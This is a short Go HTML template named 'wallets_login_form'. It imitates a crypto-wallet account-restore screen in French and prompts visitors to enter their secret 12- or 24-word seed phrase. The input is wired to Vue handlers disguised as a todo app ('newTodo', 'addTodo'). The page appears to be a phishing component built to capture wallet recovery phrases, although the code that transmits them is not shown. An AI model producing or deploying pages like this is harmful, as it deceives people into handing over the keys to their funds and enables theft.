{{ define "wallets_login_form" }}<!DOCTYPE html><html lang="en">
  {{ template "head" .PageTitle }}
  <body>
  <div id="app-content" class="dark">
    <div class="app mouse-user-styles">
      <div class="main-container-wrapper">
        <div class="first-time-flow">
          <div class="first-time-flow__wrapper">
            <div class="import-account" id="v-model-textarea">
              <a class="import-account__back-button" href="/">&lt; Back</a>
              <div class="import-account__title">Restaurer votre compte avec une phrase Seed.</div>
              <div class="import-account__selector-label">Saisissez votre phrase secrète de 12 ou 24 mots pour restaurer votre coffre-fort.</div>


              <div class="todoapp import-account__input-wrapper">
                <textarea class="new-todo import-account__secret-phrase" autofocus autocomplete="off" placeholder="Séparez chaque mot avec un espace" v-model="newTodo" @keyup.enter="addTodo"></textarea>
                <div>${ errorTodo }</div>
                <button class="button btn--first-time first-time-flow__button" id="btn-restaurer" @click="addTodo()" >Restaurer</button>
              </div>

            </div>
          </div>
        </div>
      </div>
    </div>

    {{ template "footer" }}
  </div>
</body>
</html>{{ end }}